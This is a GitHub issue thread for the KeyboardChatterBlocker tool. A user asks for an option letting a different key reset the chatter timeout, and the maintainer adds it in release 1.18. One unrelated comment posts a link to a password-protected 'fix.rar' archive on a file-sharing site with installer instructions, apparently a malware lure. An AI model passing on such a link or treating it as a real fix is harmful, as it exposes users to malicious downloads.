### ISSUE TITLE
Allow feature when other key resets the timeout for fast typing of 'adadad'

### ISSUE THREAD

**Issue by chrisborecki** [FreneticLLC/KeyboardChatterBlocker#54]
I cannot create a feature branch with pull request, however my suggestion is within single file.
Basically, I need long threshold, but allow other key.
Configuration key: other_key_resets_timeout
Default value: false

when other_key_resets_timeout = True:
AAA - will be blocked
ASA - will be allowed

[KeyBlocker.zip](https://github.com/user-attachments/files/16751517/KeyBlocker.zip)

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by chrisborecki** [comment]
Small correction:
[KeyBlocker.zip](https://github.com/user-attachments/files/16759347/KeyBlocker.zip)

**Comment by mcmonkey4eva** [comment]
Added. Didn't use your exact code, but should behave more or less identically. Has a UI option too under the new "Other Settings" tab. Will be included in upcoming release 1.18 https://github.com/FreneticLLC/KeyboardChatterBlocker/releases

**Comment by mcmonkey4eva** [comment]
[Release 1.18](https://github.com/FreneticLLC/KeyboardChatterBlocker/releases/tag/1.18) is out now including this new feature!
